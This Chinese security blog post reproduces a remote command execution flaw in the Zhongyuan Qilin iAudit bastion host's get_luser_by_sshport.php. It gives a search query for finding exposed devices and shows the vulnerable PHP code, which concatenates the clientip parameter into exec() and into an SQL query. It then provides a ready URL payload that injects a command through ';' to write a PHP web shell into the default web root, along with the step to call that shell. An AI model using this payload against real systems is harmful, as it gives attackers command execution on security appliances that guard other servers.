中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞-秋刀鱼实验室

漏洞描述

中远麒麟 iAudit堡垒机 get_luser_by_sshport.php文件存在命令拼接，攻击者通过漏洞可获取服务器权限。

漏洞影响

中远麒麟 iAudit堡垒机

网络测绘

cert.subject=”Baolei”

漏洞复现

登录页面如下

出现漏洞的文件为 get_luser_by_sshport.php

<?php
define('CAN_RUN', 1);
require_once('include/global.func.php');
require_once('include/db_connect.inc.php');
if(empty($_GET['clientip'])){
	echo 'no host';
	return;
}
if(empty($_GET['clientport'])){
	echo 'no port';
	return;
}
$cmd = 'sudo perl test.pl '.$_GET['clientip'].' '.$_GET['clientport'];
exec($cmd, $o, $r);
 $sql = "SELECT luser FROM sessions WHERE addr='".$_GET['clientip']."' and pid='".$o[0]."' order by sid desc limit 1";
$rs = mysql_query($sql);
$row = mysql_fetch_array($rs);
echo $row['luser'];
?>

其中 clientip存在命令拼接使用 ; 分割命令就可以执行任意命令

Web目录默认为 /opt/freesvr/web/htdocs/freesvr/audit/

发送Payload

https://xxx.xxx.xxx.xxx/get_luser_by_sshport.php?clientip=1;echo+%27%3C?php%20var_dump(shell_exec($_GET[cmd]));?%3E%27%3E/opt/freesvr/web/htdocs/freesvr/audit/test.php;&clientport=1

再访问写入的文件执行命令

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自秋刀鱼实验室

使用声明 1、秋刀鱼实验室
2、使用本实验室相关内容时请严格遵守《中华人民共和国网络安全法》
3、本网站的文章部分内容可能来源于网络，仅供学习参考，如有侵权，请联系support@saury.net进行删除处理。
4、本网站的文章内容仅供学习使用，切勿进行非授权测试，文章阅读者行为与本站无关。
5、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息。
7、如发现文件链接失效，请联系我们第一时间更新。

THE END

Web应用漏洞

中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

请登录后发表评论